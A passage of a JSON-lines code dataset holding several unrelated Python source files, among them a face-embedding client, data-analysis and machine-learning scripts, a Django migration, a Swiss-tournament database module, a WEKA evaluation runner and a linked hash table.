img_path = 'F:/baidu_crop/dengxiaoping_baidu/0.png'\n # img_path = 'F:/peoples_baidu/jiangzemin_baidu/146.jpg'\n # img = misc.imread(os.path.expanduser(img_path), mode='RGB')\n # faces, det_arr = load_and_align_data(img)\n\npath_exp = os.path.expanduser(image_dir)\nprint('path expanduser is {}'.format(path_exp))\nclasses = [path for path in os.listdir(path_exp) \\\n if os.path.isdir(os.path.join(path_exp, path))]\nclasses.sort()\nnrof_classes = len(classes)\nprint('have {} class(es), and class is {}'.format(nrof_classes, classes))\nfor i in range(nrof_classes):\n class_name = classes[i]\n facedir = os.path.join(path_exp, class_name)\n for j in os.listdir(facedir):\n img_path = os.path.join(facedir,j)\n file_name = j\n\n files = {\"file\": open(img_path, \"rb\")}\n # r = requests.post(\"http://192.168.1.254:5001/v1/face_censor\", files=files)\n r = requests.post(\"http://0.0.0.0:5000/upload\", files=files)\n returnval = json.loads(r.text)\n\n dataset.append(ImageEmbClass(class_name, file_name, returnval['emb']))\n\n print(returnval)\n\n\n # image_show = cv2.cvtColor(np.reshape(int(returnval['image_data']), (182,182, 3)))\n # cv2.imshow(image_show)\n # cv2.waitKey()\n\n\n\n","sub_path":"faceNet/get_emb_serving/img_client.py","file_name":"img_client.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286974611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 5 08:17:45 2019\r\n\r\n@author: iloo\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import os\r\n\r\n\"\"\"\r\nnumeric: price, minimum_nights, number_of_review,\r\ncalculated_host_listings_count, availability_365, reviews_per_month\r\n\r\nlast_review\r\nlatitude, longitude\r\n\r\ncategorical: id, host_id, host_name, neighbourhood_group\r\nneighbourhood, room_type\r\n\r\nQuestions:\r\n What can we learn about different hosts and areas?\r\n What can we learn from predictions? (Locations, prices, reviews, etc)\r\n Which hosts are the busiest and why?\r\n Is there any noticeable difference of traffic among different areas \r\n and what could be the reason for it?\r\n\"\"\"\r\n\r\ndef dataE(df):\r\n desc = df.describe()\r\n for i in range(2,len(desc.columns)):\r\n print(desc.iloc[:,i])\r\n print('\\n')\r\n desc1 = df.describe(include='object')\r\n for i in range(len(desc1.columns)):\r\n print(desc1.iloc[:,i])\r\n print('\\n')\r\n \r\n null_list = []\r\n null_val = []\r\n for i in range(len(df.columns)):\r\n if df.iloc[:,i].isnull().values.any():\r\n nulls = df.columns[i]\r\n nulls_num = df.iloc[:,i].isnull().sum()\r\n null_list.append(nulls)\r\n null_val.append(nulls_num)\r\n print('Missing Values...')\r\n print(null_list)\r\n print(null_val)\r\n\r\n\"\"\"\r\nMissing values: name, host_name, last_review, reviews_per_month\r\n\"\"\"\r\n\r\ndef dataE1(df):\r\n #Using only price, minimum_nights, number_of_review\r\n #calculated_host_listings_count, availability_365\r\n dfnumeric = df[['price','minimum_nights','number_of_reviews',\r\n 'calculated_host_listings_count','availability_365']]\r\n corr = dfnumeric.corr()\r\n \r\n namelist = np.asarray(dfnumeric.columns,dtype=str)\r\n for name1 in namelist:\r\n namelist = namelist[namelist != name1]\r\n for name2 in namelist:\r\n plt.figure(figsize=(8,8))\r\n plt.scatter(dfnumeric[name1],dfnumeric[name2])\r\n plt.title('%s VS %s' %(name1,name2))\r\n plt.show()\r\n return corr\r\n\r\n\"\"\"\r\nThings don't seem to be correlated at all. Which is good. Independent of each other.\r\nLets try with the name variables and make bar graphs\r\n\"\"\"\r\n\r\ndef dataE2(df):\r\n #Use Room Type... Neighborhood and Neighborhood Group have too many unique\r\n dfnumeric = df[['price','minimum_nights','number_of_reviews',\r\n 'calculated_host_listings_count','availability_365']]\r\n room_type = df['room_type']\r\n rtuniq = room_type.unique()\r\n \r\n index1 = room_type == rtuniq[0]\r\n index2 = room_type == rtuniq[1]\r\n index3 = room_type == rtuniq[2]\r\n \r\n namelist = np.asarray(dfnumeric.columns,dtype=str)\r\n \r\n for name in namelist:\r\n namedf1 = dfnumeric.loc[index1,name].to_numpy() \r\n namedf2 = dfnumeric.loc[index2,name].to_numpy()\r\n namedf3 = dfnumeric.loc[index3,name].to_numpy()\r\n boxplotdata = [namedf1,namedf2,namedf3]\r\n plt.figure(figsize=(10,10))\r\n plt.boxplot(boxplotdata,labels = [rtuniq[0],rtuniq[1],rtuniq[2]])\r\n plt.title('%s by Room Type' %(name))\r\n \r\n plt.show() \r\n\r\nif __name__ == '__main__':\r\n df = pd.read_csv('AB_NYC_2019.csv',index_col=False)\r\n dataE(df)\r\n dataE1(df)\r\n dataE2(df)\r\n\r\n","sub_path":"NYC AirBNB/NYCAB_DE.py","file_name":"NYCAB_DE.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"604319936","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import fetch_openml\nfrom sklearn import metrics\nfrom sklearn.svm import SVC\nimport matplotlib.pyplot as plt\n\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX = X /255.0\n\nprint(\"fetched !\")\n\nX_train, X_test = X[:1000], X[1000:] ; y_train, y_test = y[:1000], y[1000:]\n\n\nmodel_SVC_wr = SVC(C=10, gamma=0.001, kernel=\"rbf\")\nmodel_SVC_wr.fit(X_train, y_train)\ny_predict_SVC_wr = model_SVC_wr.predict(X_test)\n\n\nmodel_SVC_wor = SVC(C=1000, gamma=0.001, kernel=\"rbf\")\nmodel_SVC_wor.fit(X_train, y_train)\ny_predict_SVC_wor = model_SVC_wor.predict(X_test)\n\n\nprint(\"SVC Model using regularization accuracy: \\t\", \n metrics.accuracy_score(y_test, y_predict_SVC_wr), \"\\n\")\nprint(\"SVC Model using regularization accuracy: \\t\",\n metrics.accuracy_score(y_test, y_predict_SVC_wor), \"\\n\")\n\n","sub_path":"HW-2/practical_SVC.py","file_name":"practical_SVC.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277862731","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport accounts.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('gender', models.CharField(blank=True, help_text='Select a gender for the user profile', max_length=6, verbose_name='User gender', choices=[(b'Male', 'Male'), (b'Female', 'Female')])),\n ('measures', models.CharField(help_text='Measures for this user', max_length=300, verbose_name='User measures')),\n ('image_profile', models.ImageField(default=b'/static/accounts/img/profile-photo.png', upload_to=accounts.models.get_file_path, blank=True, help_text='Upload an image for the user profile', verbose_name='User image profile')),\n ('authentication_user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'User',\n 'verbose_name_plural': 'Users',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"fitme/accounts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"85723531","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n# sort 내장함수 사용\nT = int(input())\nfor _ in range(T):\n test_num, tc = input().split()\n tc = int(tc)\n numbers = input().split()\n earth_num = {\"ZRO\" : 0, \"ONE\" : 1, \"TWO\" : 2, \"THR\" : 3, \"FOR\" : 4, \"FIV\" : 5, \"SIX\" : 6, \"SVN\" : 7, \"EGT\" : 8, \"NIN\" : 9}\n\n for i in range(tc):\n numbers[i] = earth_num[numbers[i]]\n numbers.sort()\n for i in range(tc):\n for key, value in earth_num.items():\n if numbers[i] == value:\n numbers[i] = key\n break\n\n print(\"{} {}\".format(test_num, ' '.join(numbers)))\n\n","sub_path":"SWEA/1221_GNS/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149220660","text":"#!/usr/bin/env python\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import random_split\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport time\nimport pandas as pd\nfrom customDataset import HCPanatDataset, CropBorders3D\nfrom cnn import Conv3DNet, training_loop_conv, validate_conv\n\ntorch.set_printoptions(edgeitems=2)\ntorch.manual_seed(0)\n\n#filenames\n#src_dir = '../data/HCP-anat-data'\nsrc_dir = '../data/HCP-anat'\nimg_dir = src_dir + '/images-three-classes/'\ntarget_file = src_dir + '/annotations-three-classes.csv'\ndataset = HCPanatDataset(csv_file=target_file, root_dir=img_dir)\n\n#hyperparameters\nn_crop = 5\nperc_train = 0.85\nn_epochs = 20\nbatch_size = 4\nlearning_rate = 1e-3\n\n#apply some transformation to the data (crop)\ntransformed_dataset = HCPanatDataset(\n csv_file=target_file, \n root_dir=img_dir, \n transform=transforms.Compose([\n CropBorders3D(n_crop)]))\n\n#check dimensions\nt1, _ = transformed_dataset[0]\nprint(\"Shape of one image after cropping %i slices at the borders:\" %n_crop)\nprint(t1.shape)\n\n#compute the mean and std of the data\nmax_dim = len(t1.shape) #concatenating dimension\nimgs = np.stack([img for img, _ in transformed_dataset], axis=max_dim)\nmean = np.mean(imgs)\nstd = np.std(imgs)\nmean, std\n\n#normalize the data\nnormalized_dataset = HCPanatDataset(\n csv_file=target_file, \n root_dir=img_dir, \n transform=transforms.Compose([\n CropBorders3D(n_crop),\n transforms.ToTensor(),\n transforms.Normalize(mean,std)]))\n\n#split the dataset into training and test sets with torch.utils.data.random_split\nN = len(normalized_dataset)\ntrain_set, test_set = random_split(normalized_dataset, [int(perc_train*N), N-int(perc_train*N)]) \nprint(\"Total number of images: %i\" %N)\nprint(\"Number of training images: %i\" %(perc_train*N))\nprint(\"Number of test images: %i\" %(N-int(perc_train*N)))\n\n#infer number of features\nn_in = imgs.shape[0] * imgs.shape[1] * imgs.shape[2] #number of input features\nlabels = pd.read_csv(target_file)['label']\nn_out = len(np.unique(labels)) #number of output features, i.e. number of classes\nprint(\"The number of input feature is: %i\" %n_in)\nprint(\"The number of output feature is: %i\" %n_out)\n\n#assuming that we are on a CUDA machine, this should print a CUDA device:\ndevice = (torch.device('cuda') if torch.cuda.is_available() \n else torch.device('cpu'))\nprint(f\"Training on device {device}.\")\n\n#define the model, the optimizer and the loss\nin_shape3d = t1.shape\nconv_model = Conv3DNet(in_shape3d, n_out=n_out).to(device=device)\noptimizer = optim.SGD(conv_model.parameters(), lr=learning_rate)\nloss_fn = nn.CrossEntropyLoss()\n\n#split the datasets into batches\ntrain_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\ntest_loader = DataLoader(dataset=test_set, batch_size=batch_size, shuffle=True)\n\n#training and showing also validation loss\nt0 = time.time()\nloss_vector, loss_val_vector = training_loop_conv(\n model = conv_model,\n train_loader = train_loader,\n test_loader = test_loader,\n criterion = loss_fn,\n optimizer = optimizer,\n n_epochs = n_epochs)\nprint(\"Training time = %f seconds\" %(time.time()-t0))\n\n#plot training and validation loss\nplt.figure()\nx_axis = np.arange(n_epochs)\nplt.plot(x_axis, loss_vector, 'r--', label='loss train')\nplt.plot(x_axis, loss_val_vector, 'g--', label='loss val')\nplt.ylim(0, 0.6)\nplt.legend()\nplt.xlabel(\"epochs\")\nplt.ylabel(\"loss\")\nplt.savefig('training_validation_losses.png')\n\n#compute accuracy in training and validation\nvalidate_conv(conv_model, train_loader, test_loader)\n\nnumel_list = [p.numel()\n for p in conv_model.parameters()\n if p.requires_grad == True]\nsum(numel_list), numel_list","sub_path":"code/convolution_nn_gpu_3classes.py","file_name":"convolution_nn_gpu_3classes.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117984220","text":"def solve(a):\n memo = [-1]*(len(a)+1)\n return jp(a,memo)\ndef jp(x,memo):\n y = len(x)\n if memo[y] != -1:\n return memo[y]\n if y == 0:\n memo[y] = 0\n return memo[y]\n elif y == 1:\n memo[y] = 0\n return memo[y]\n elif y == 2:\n memo[y] = x[1]\n return memo[y]\n else:\n best = -1\n a = jp(x[2:],memo)+x[1]\n b = jp(x[3:],memo)+x[2]\n if len(x) >= 4:\n c = jp(x[4:],memo)+x[3]\n if len(x) >= 5:\n d = jp(x[5:],memo)+x[4]\n if len(x) >= 6:\n e = jp(x[6:],memo)+x[5]\n memo[y] = max(a,b,c,d,e)\n return memo[y]\ninp = int(input())\nfor i in range(1,inp+1):\n a = input()\n l = list(map(int,input().split()))\n print(\"Case \",i,\" :\",solve(l),sep = '')\n \n \n \n","sub_path":"Lomba Lomba/ICPC-Maranatha-2018/ICPC-G.py","file_name":"ICPC-G.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"395613479","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\nimport psycopg2\n\n\ndef connect(database_name=\"tournament\"):\n \"\"\"Connect to the PostgreSQL database. :returns: a database connection.\n :param database_name: Gives a name to the database. Default: 'tournament'\"\"\"\n try:\n db = psycopg2.connect(\"dbname={}\".format(database_name))\n cursor = db.cursor()\n return db, cursor\n except Exception:\n print(\"Failed to connect to database\")\n\ndef delete_matches():\n \"\"\"Remove all the match records from the database.\n \"\"\"\n db_query(\"DELETE FROM matches;\")\n\n\ndef delete_players():\n \"\"\"Remove all the player records from the database.\n \"\"\"\n db_query(\"DELETE FROM players;\")\n\n\ndef count_players():\n \"\"\":returns: the number of players currently registered.\n \"\"\"\n count = data_pull(\"SELECT count(*) FROM players;\")\n return count[0][0]\n\n\ndef register_player(name):\n \"\"\"Adds a player to the tournament database.\n\n The database assigns a unique serial id number for the player. (This\n should be handled by your SQL database schema, not in your Python code.)\n\n :param name: the player's full name (need not be unique).\n \"\"\"\n sql = \"INSERT INTO players (name) VALUES (%s)\"\n data = (name, )\n db_query(sql, data)\n\n\ndef player_standings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place,\n or a player\n tied for first place if there is currently a tie.\n\n\n :returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n standings = data_pull(\"SELECT * FROM standings_view\")\n return standings\n\n\ndef report_match(winner, loser, draw=False):\n \"\"\"Records the outcome of a single match between two players.\n\n when draw = FALSE, both players have the match number incremented, the\n winner increments wins by 1, and the losers's number of wins is added to the\n o_points.\n when draw = TRUE, increments draw and matches in both players, each other's\n wins are added to the other's o_points\n\n :param winner: the id number of the player who won\n :param loser: the id number of the player who lost\n :param draw: boolean determining if the match was a draw.\n \"\"\"\n sql = \"INSERT INTO matches (winner, loser, draw) VALUES (%s, %s, %s)\"\n data = (winner, loser, draw,)\n db_query(sql, data)\n\n\ndef swiss_pairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n :returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n standing = player_standings()\n previous_matches = data_pull(\"SELECT winner, loser FROM matches\")\n pairs = []\n\n while len(standing) > 1:\n player1 = standing.pop()\n player2 = standing.pop()\n\n if set((player1[0], player2[0])) in previous_matches:\n replace = standing.pop()\n standing.append(player2)\n pairs.append((player1[0], player1[1], replace[0], replace[1]))\n else:\n pairs.append((player1[0], player1[1], player2[0], player2[1]))\n\n return pairs\n\n\ndef db_query(query, data=None):\n \"\"\"Function for querying the database\n\n Connects to db, selects cursor, passes query to db, commits, and closes\n the connection.\n\n Args:\n query: String to query the database\n data: The information to be injected to the query. Can be left blank\n\n \"\"\"\n conn, c = connect()\n c.execute(query, data)\n conn.commit()\n conn.close()\n\n\ndef data_pull(query, data=None):\n \"\"\" Function for querying the database to retrieve data\n\n Connects to db, selects cursor, passes query to db, saves data, closes\n the connection, then returns the data\n\n Args:\n query: String to query the database\n data: The information to be injected to the query. Can be left blank\n\n Returns:\n Data from pulled from the database\n \"\"\"\n conn, c = connect()\n c.execute(query, data)\n data = c.fetchall()\n conn.close()\n return data\n\n","sub_path":"vagrant/tournament/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55061496","text":"#!/usr/bin/env python\n\nimport copy\nimport optparse\nimport subprocess\nimport sys\n\n\nbenchmarks = [\n 'jacobi-1d',\n 'jacobi-1d-5pt',\n 'jacobi-1d-7pt',\n 'jacobi-2d',\n 'jacobi-3d',\n 'poisson-2d',\n 'fdtd-2d',\n 'rician-2d',\n 'gradient-2d'\n]\n\nblock_sizes = [\n [16, 8],\n [32, 8],\n [48, 8],\n [64, 8],\n [80, 8],\n [16, 4],\n [32, 4],\n [48, 4],\n [64, 4],\n [80, 4]\n\n# [96, 4],\n# [32, 12],\n# [80, 4],\n# [16, 4]\n\n# [64, 4]\n\n# [96, 4],\n# [64, 4],\n# [128, 8],\n# [32, 4],\n# [128, 1],\n# [16, 10, 2]\n]\n\n\nparser = optparse.OptionParser()\nparser.add_option('-j', '--jar', dest='jar',\n action='store', type='string',\n help='WEKA Class Path')\nparser.add_option('-c', '--classifier', dest='classifier',\n action='store', type='string',\n default='weka.classifiers.lazy.IBk',\n help='WEKA Classifier')\nparser.add_option('-d', '--device', dest='device',\n action='store', type='string',\n help='Device name')\nparser.add_option('-a', '--train-all', dest='train_all',\n action='store_true', default=False,\n help='Train on all block sizes')\nparser.add_option('-t', '--test-all', dest='test_all',\n action='store_true', default=False,\n help='Test on all block sizes')\n\n\n\n\n(options, args) = parser.parse_args()\n\nweka_log = open('weka.log', 'w')\n\nfor left_out in benchmarks:\n\n print('Testing on %s' % left_out)\n\n remaining = copy.deepcopy(benchmarks)\n remaining.remove(left_out)\n\n training_file = open('training.csv', 'w')\n first = True\n\n # Build training data\n for trainer in remaining:\n if options.train_all:\n data = open('%s-scaling.%s.csv' % (trainer, options.device))\n args = ['../../scripts/extract-features.py']\n if first:\n args.append('-p')\n first=False\n subprocess.call(args, stdout=training_file, stdin=data)\n data.close()\n else:\n for bs in block_sizes:\n data = open('%s-scaling.%s.csv' % (trainer, options.device))\n args = ['../../scripts/extract-features.py']\n args.append('-x')\n args.append(str(bs[0]))\n args.append('-y')\n args.append(str(bs[1]))\n if first:\n args.append('-p')\n first=False\n subprocess.call(args, stdout=training_file, stdin=data)\n data.close()\n\n training_file.close()\n\n # Build the model\n args = ['java', '-cp', options.jar, options.classifier, '-t',\n 'training.csv', '-d', 'testing.model', '-no-cv']\n subprocess.call(args, stdout=weka_log, stderr=weka_log)\n\n # Build the test data\n test_file = open('test.csv', 'w')\n\n first = True\n if options.test_all:\n args = ['../../scripts/extract-features.py']\n if first:\n args.append('-p')\n first = False\n data = open('%s-scaling.%s.csv' % (left_out, options.device))\n subprocess.call(args, stdout=test_file, stdin=data)\n data.close()\n else:\n for bs in block_sizes:\n args = ['../../scripts/extract-features.py']\n args.append('-x')\n args.append(str(bs[0]))\n args.append('-y')\n args.append(str(bs[1]))\n if first:\n args.append('-p')\n first = False\n data = open('%s-scaling.%s.csv' % (left_out, options.device))\n subprocess.call(args, stdout=test_file, stdin=data)\n data.close()\n\n test_file.close()\n\n # Test the model\n args = ['java', '-cp', options.jar, options.classifier, '-T',\n 'test.csv', '-l', 'testing.model', '-p', '0']\n proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n args = ['../../scripts/parse-weka-results.py']\n subprocess.call(args, stdin=proc.stdout)\n\n \nweka_log.close()\n","sub_path":"scripts/run-weka.py","file_name":"run-weka.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48945987","text":"\"\"\"\nThis module contains functions to add actors to a scene according to a formation defined in YAML.\n\nSee game/formations/invaders.yaml for a simple example of a formation file. These functions are called by a scene with four arguments: the scene object, the x and y offsets, and the corresponding dictionary from the YAML.\n\"\"\"\n\nimport pyglet\n\nimport actor\nimport util\n\ndef single(scn, x, y, attrs):\n \"\"\"Simplest shape, a lone actor\"\"\"\n new_actor = actor.Actor(scn, scn.batch, kind=attrs['sprite'], \n x=attrs['x']+x, y=attrs['y']+y)\n scn.actors[new_actor.name] = new_actor\n return [new_actor]\n\ndef grid(scn, x, y, attrs):\n \"\"\"An attrs['rows'] x attrs['columns'] grid of actors centered at (x, y) at intervals of (attrs['padding_x'], attrs['padding_y'])\"\"\"\n \n new_actors = []\n origin_x = -attrs['columns']*attrs['padding_x']/2+attrs['x']+x+attrs['padding_x']/2\n origin_y = -attrs['rows']*attrs['padding_y']/2+attrs['y']+y+attrs['padding_y']/2\n for item_x in range(attrs['columns']):\n for item_y in range(attrs['rows']):\n new_actor = actor.Actor(scn, scn.batch, kind=attrs['sprite'],\n x=origin_x+item_x*attrs['padding_x'], \n y=origin_y+item_y*attrs['padding_y'])\n scn.actors[new_actor.name] = new_actor\n new_actors.append(new_actor)\n return new_actors\n","sub_path":"engine/formations.py","file_name":"formations.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546852288","text":"__author__ = 'ash31891'\n\nfrom collections.abc import Iterable\nimport set\n\nclass LinkedHashTable (set.SetType, Iterable):\n\n __slots__ = 'LOAD_LIMIT', 'back', 'front', 'size', 'table', 'INITIAL_NUM_BUCKETS', 'MIN_BUCKETS'\n\n def __init__(self, initial_num_buckets=100, load_limit=0.75):\n\n set.SetType.__init__( self )\n self.MIN_BUCKETS = 10\n self.INITIAL_NUM_BUCKETS = self.MIN_BUCKETS if initial_num_buckets < self.MIN_BUCKETS else initial_num_buckets\n self.table = initial_num_buckets * [ None ]\n self.LOAD_LIMIT = load_limit\n self.front = self.ChainNode(None)\n self.back = self.ChainNode(None)\n\n class ChainNode (object):\n\n __slots__ = 'chain', 'link', 'obj', 'prev'\n\n def __init__(self, obj, prev=None, link=None, chain=None):\n\n self.obj = obj\n self.prev = prev\n self.link = link\n self.chain = chain\n\n def __str__( self ):\n return \"(\" + str( self.obj ) + \")\"\n\n def __iter__(self):\n \"\"\"\n Build an iterator.\n :return: an iterator for the current elements in the set\n \"\"\"\n node = self.front\n while node is not None:\n yield node.obj\n node = node.link\n\n def add(self, obj):\n \"\"\"\n Insert a new object into the set.\n Do not add if self.contains(obj).\n :param obj: the object to add\n :return: None\n :post: self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor >= self.LOAD_LIMIT:\n self._rehashExpand()\n\n if self.contains(obj):\n #print('Duplicate Value')\n pass\n else:\n index = hash (obj) % len(self.table)\n front = self.table[ index ]\n if self.size == 0:\n current = LinkedHashTable.ChainNode(obj)\n self.front = current\n self.back = current\n self.table[ index ] = current\n self.size += 1\n else:\n current = LinkedHashTable.ChainNode(obj, self.back, None, None)\n self.back.link = current\n self.back = current\n self.size += 1\n if front is None:\n self.table[index] = current\n #elif front.chain is not None:\n else:\n while front.chain is not None:\n front = front.chain\n front.chain = current\n #else:\n #print(self.size , self.back.obj, self.front.obj)\n\n def contains(self, obj):\n \"\"\"\n Is the given obj in the set?\n The answer is determined through use of the '==' operator,\n i.e., the __eq__ method.\n :return: True iff obj or its equivalent has been added to this set\n and not removed\n \"\"\"\n #return False\n index = hash (obj) % len(self.table)\n #index = hash_function( key, len( self.table ) )\n entry = self.table[ index ]\n while entry is not None:\n if entry.obj == obj:\n return True\n entry = entry.chain\n return False\n '''\n def remove(self, obj):\n \"\"\"\n Remove an object from the set.\n :param obj: the value to remove\n :return: None\n :post: not self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor <= 1-self.LOAD_LIMIT\n if load_factor >= self.LOAD_LIMIT:\n self._rehashShrink()\n #print('**Size is :**',self.size)\n index = hash (obj) % len(self.table)\n current = self.table[index]\n prev = self.table[index]\n if self.contains(obj):\n if current.obj == obj and self.front.obj == obj:\n self.table[index] = current.chain\n current.link.prev = None\n self.front = self.front.link\n self.size -= 1\n elif current.obj == obj and self.back.obj == obj:\n self.table[index] = current.chain\n self.back = self.back.prev\n current.prev.link = current.link\n self.size -= 1\n else:\n while current.prev is not None :\n if current.obj == obj:\n prev.chain = current.chain\n current.prev.link = current.link\n current.link.prev = current.prev\n self.size -= 1\n #current.chain = current.chain.chain\n else:\n prev = current\n current = current.chain\n else:\n print('Element Not Found')\n '''\n\n def remove(self, obj):\n \"\"\"\n Remove an object from the set.\n :param obj: the value to remove\n :return: None\n :post: not self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor <= 1-self.LOAD_LIMIT:\n self._rehashShrink()\n\n index = hash (obj) % len(self.table)\n current = self.table[index]\n prev = self.table[index]\n if self.contains(obj):\n if current.obj == obj and self.front.obj == obj and self.size > 1:\n self.table[index] = current.chain\n current.link.prev = None\n self.front = self.front.link\n self.size -= 1\n elif current.obj == obj and self.front.obj == obj and self.size <= 1:\n self.table[index] = current.chain\n current = None\n self.front = None\n self.size -= 1\n elif current.obj == obj and self.back.obj == obj:\n self.table[index] = current.chain\n self.back = self.back.prev\n current.prev.link = current.link\n self.size -= 1\n else:\n while current.prev is not None :\n if current.obj == obj:\n prev.chain = current.chain\n current.prev.link = current.link\n current.link.prev = current.prev\n self.size -= 1\n break\n #current.chain = current.chain.chain\n else:\n prev = current\n current = current.chain\n else:\n print('Element Not Found')\n\n def _rehashExpand( self ):\n \"\"\"\n Rebuild the map in a larger table. The current map is not changed\n in any way that can be seen by its clients, but internally its table is\n grown.\n :return: None\n \"\"\"\n new_cap = self.MIN_BUCKETS if 2 * self.INITIAL_NUM_BUCKETS < self.MIN_BUCKETS else 2*self.INITIAL_NUM_BUCKETS\n print( \"Rehashing from\",self.INITIAL_NUM_BUCKETS, \"to\", new_cap )\n self.INITIAL_NUM_BUCKETS = new_cap\n node = self.front\n self.front = None\n self.back = None\n self.size = 0\n self.table = new_cap * [None]\n while node is not None:\n self.add(node.obj)\n node = node.link\n\n def _rehashShrink( self ):\n \"\"\"\n Rebuild the map in a larger table. The current map is not changed\n in any way that can be seen by its clients, but internally its table is\n grown.\n :return: None\n \"\"\"\n new_cap = self.MIN_BUCKETS if self.INITIAL_NUM_BUCKETS // 2 < self.MIN_BUCKETS else self.INITIAL_NUM_BUCKETS // 2\n print( \"Rehashing from\",self.INITIAL_NUM_BUCKETS, \"to\", new_cap )\n self.INITIAL_NUM_BUCKETS = new_cap\n node = self.front\n self.front = None\n self.back = None\n self.size = 0\n self.table = new_cap * [None]\n while node is not None:\n self.add(node.obj)\n node = node.link\n\n\ndef print_set( a_set ):\n for word in a_set: # uses the iter method\n print( word, end=\" \" )\n print()\n\ndef main():\n table = LinkedHashTable (100)\n table.add('batman')\n table.add('has')\n table.add('lots')\n table.add('of')\n table.add('gizmos')\n table.add('in')\n table.add('his')\n table.add('belt')\n print_set(table)\n table.remove('has')\n print_set(table)\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"Assignment10/linkedhashtable.py","file_name":"linkedhashtable.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161528566","text":"#coding:utf-8\n\n\"\"\"\nExercice 20 : \n\n\tEcrire un algorithme qui demande successivement 10 nombres à l'utilisateur, \n\tet qui affiche à la fin le plus grand de ces 10 nombres Et affiche aussi \n son rang dans la liste saisie\n\"\"\"\n\nprint(\"---------------------------- Le plus Grand et Rang --------------------------------------\")\n\nprint(\" Saisir 10 nombre entier :: \")\n\nmax = 0\nrang = 0\n\ntaille = 10\ni = 1\nwhile(i <= taille) :\n print(\"Nombre \", i , \" ::\")\n val = int(input(\"> \"))\n if(i == 1) :\n max = val\n rang = i\n else:\n if max < val:\n max = val\n rang = i\n i += 1\n\nprint(\"Le nombre le plus grand est :: \", max,\" \\nSont rang est :: \", rang)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"algo_td1_python/Exercice_20.py","file_name":"Exercice_20.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648393482","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nfrom animal_factory import *\n\nclass AnimalTestCase(unittest.TestCase):\n def test_dog(self):\n dog = AnimalFactory()\n call = dog.make_sound('Dog')\n self.assertEqual(call, 'Bhow Bhow!!')\n \n def test_cat(self):\n cat = AnimalFactory()\n call = cat.make_sound('Cat')\n self.assertEqual(call, \"Meow Meow!!\")\n \nif __name__ == \"__main__\":\n 